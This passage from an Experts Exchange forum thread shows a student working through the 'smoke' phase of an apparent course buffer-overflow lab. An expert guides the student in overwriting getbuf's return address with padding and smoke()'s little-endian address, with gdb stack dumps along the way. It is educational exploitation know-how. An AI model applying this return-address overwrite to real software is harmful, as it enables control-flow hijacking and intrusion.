0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) c
Continuing.
Type string:test

Breakpoint 2, 0x08048f51 in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0x74736574
0xbfffb400:     0x00857f00      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb)

 

by: Infinity08Posted on 2009-11-03 at 05:40:32ID: 25728771

>> do i simply type the memory address for smoke() to call it?

If you overwrite the return address with the address of the first instruction in the smoke function, then as soon as the getbuf function ends, it will go to the (now overwritten) return address, and start executing there.

 

by: Infinity08Posted on 2009-11-03 at 05:43:13ID: 25728798

>> It seems the string was entered after 0x0804a108

Right. 0x74736574 0x00 is the "test" string.

>> Do I need to convert the four addresses to bytes and pass the bytes as the string?

Yes, you need to pass a string that has the desired new return address at the right location.

 

by: purewinPosted on 2009-11-03 at 05:55:19ID: 25728904

Sooo would these 0x74736574     0x00857f00      0x00000003      0xbfffb428 mean i would a string of 8 bytes followed by the byte equivalent of the smoke() address?

 

by: Infinity08Posted on 2009-11-03 at 05:57:36ID: 25728927

>> mean i would a string of 8 bytes followed by the byte equivalent of the smoke() address?

12 bytes, but yes, that's the idea.

 

by: purewinPosted on 2009-11-03 at 06:03:37ID: 25728985

so as long as its 12 bytes then the address it can be any string to make up the 12 bytes?

 

by: Infinity08Posted on 2009-11-03 at 06:12:25ID: 25729070

12 bytes of whatever data you need, to overwrite the 0x74736574     0x00857f00      0x00000003.
Then 4 bytes that contain the desired new return address.
For a total of 16 bytes.

 

by: purewinPosted on 2009-11-03 at 06:14:46ID: 25729094

I tried to pass "0xbfffb434 0x00857ff4 0x00000003 0xbfffb428 0x08048d90" as the string but I got a segmentation fault. The far right address is the address for smoke().

 

by: Infinity08Posted on 2009-11-03 at 06:17:37ID: 25729120

No, you need to pass one character per byte. So, a total of 16 characters. The last 4 characters will represent the 4 bytes of the new return address (check the extended ASCII set to know which characters you need).

 

by: purewinPosted on 2009-11-03 at 06:23:54ID: 25729182

okay I tried the x/32b command to get the numbers to match against the chart but I have a couple extra lines...what are they used for?

(gdb) x/32b $sp
0xbfffb3f0:     0xfc    0xb3    0xff    0xbf    0x00    0x00    0x00    0x00
0xbfffb3f8:     0x08    0xa1    0x04    0x08    0x34    0xb4    0xff    0xbf
0xbfffb400:     0xf4    0x7f    0x85    0x00    0x03    0x00    0x00    0x00
0xbfffb408:     0x28    0xb4    0xff    0xbf    0x7e    0x8f    0x04    0x08
(gdb)

 

by: purewinPosted on 2009-11-03 at 06:45:51ID: 25729395

Nevermind about the extra lines I figured that out. Just trying to figure out how to read the numbers to make sure they're in order...

 

by: purewinPosted on 2009-11-03 at 06:47:16ID: 25729414

Do you read them across? And then read the next line and so on? Kind confused on how to change them into a single line....

 

by: Infinity08Posted on 2009-11-03 at 07:23:38ID: 25729782

0xbfffb434 is a 32bit value, shown in hexadecimal.
If you show that same value as 4 8bit bytes (again in hexadecimal), you get : 0xbf 0xff 0xb4 0x34

It's the same value, just presented differently.

 

by: purewinPosted on 2009-11-03 at 09:51:51ID: 25731551

I have everything replaced exactly but I'm still getting a segmentation fault though everything matches up....

Breakpoint 1, 0x08048f79 in test ()
(gdb) c
Continuing. 
Breakpoint 2, 0x08048f4c in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x08048f7e
0xbfffb410:     0x00000003      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32b $sp
0xbfffb3f0:     0xfc    0xb3    0xff    0xbf    0x00    0x00    0x00    0x00
0xbfffb3f8:     0x08    0xa1    0x04    0x08    0x34    0xb4    0xff    0xbf
0xbfffb400:     0xf4    0x7f    0x85    0x00    0x03    0x00    0x00    0x00
0xbfffb408:     0x28    0xb4    0xff    0xbf    0x7e    0x8f    0x04    0x08
(gdb) c
Continuing. 
Breakpoint 3, 0x08048f51 in getbuf ()
(gdb) x/32xw $sp
0xbfffb3f0:     0xbfffb3fc      0x00000000      0x0804a108      0xbfffb434
0xbfffb400:     0x00857ff4      0x00000003      0xbfffb428      0x83e58955
0xbfffb410:     0x00000000      0x008584c0      0x08049983      0xbfffb434
0xbfffb420:     0xbfffb434      0xdeadbeef      0xbfffe9f8      0x08049056
0xbfffb430:     0x08049983      0x000000f4      0x00003560      0x00000000
0xbfffb440:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb450:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
0xbfffb460:     0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4      0xf4f4f4f4
(gdb) x/32b $sp
0xbfffb3f0:     0xfc    0xb3    0xff    0xbf    0x00    0x00    0x00    0x00
0xbfffb3f8:     0x08    0xa1    0x04    0x08    0x34    0xb4    0xff    0xbf
0xbfffb400:     0xf4    0x7f    0x85    0x00    0x03    0x00    0x00    0x00
0xbfffb408:     0x28    0xb4    0xff    0xbf    0x55    0x89    0xe5    0x83
(gdb) c
Continuing. 
Program received signal SIGSEGV, Segmentation fault.
0x83e58955 in ?? ()
(gdb) 

                                              
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:
22:
23:
24:
25:
26:
27:
28:
29:
30:
31:
32:
33:
34:
35:
36:
37:
38:
39:
40:
41:
42:
43:

Select allOpen in new window

 

by: purewinPosted on 2009-11-03 at 09:54:35ID: 25731584

Nevermind, had wrong address for smoke() phase 0 done. Thanks for helping me! I really appreciate it.

 

by: Infinity08Posted on 2009-11-03 at 10:55:18ID: 25732178

Congratulations !

 

by: purewinPosted on 2009-11-03 at 11:10:15ID: 25732345

Any chance you would care to help me out with phase 1 I've started another question here:
http://www.experts-exchange.com/Programming/Languages/Assembly/Q_24868074.html

 

by: Infinity08Posted on 2009-11-03 at 13:26:26ID: 25733919

I see there's no need any more :) You seem to be doing fine !

 

by: lecosPosted on 2010-04-26 at 11:26:33ID: 32174893

Hi infinity,

Im working on this lab but when i use the address of smoke( 0x08048d90) , I get an error.

Is this the correct address i should be using???

 

by: lecosPosted on 2010-04-26 at 11:40:01ID: 32176093




Nevermind.... i was inputting the values incorrectly.

the way it is supposed to be is like :  90 8d 04 08

 

by: Infinity08Posted on 2010-04-26 at 12:57:20ID: 32182856

>> the way it is supposed to be is like :  90 8d 04 08

little endian byte order ;)

20120131-EE-VQP-002

3 Ways to Join

30-Day Free Trial

The Experts

98% positive feedback on 31,087 answers since March 2000. angeliii is a Microsoft Most Valuable Professional for his work with MS SQL Server & Develoment.

He has also proven his knowledge of Visual Basic Programming, PHP Scripting and Oracle Databases.

The Experts

97% positive feedback on 10,752 answers since July 2000. lrmoore has more than 18 years experience in the networking industry.

The six-time Mircosoft MVPs specialties include firewalls, virtual private networking, and network management.

Testimonials

"...and excellent source for support... Kind of like having your very own IT dept." Electriciansnet

Testimonials

"I was apprehensive at signing up at first. However... it has already made my life as an IT administrator much easier." JaCrews

Testimonials

"WOW! You guys have great, active, and knowledgeable people on here." moore50

Business Clients

Business Clients

In the Press

"If you’ve got a question... Experts Exchange can supply an answer.”

In the Press

"...an invaluable aid for both IT professionals and those who require tech support."

In the Press

"where IT professionals provide quick answers on just about any topic"

Business Account Plans

Loading Advertisement...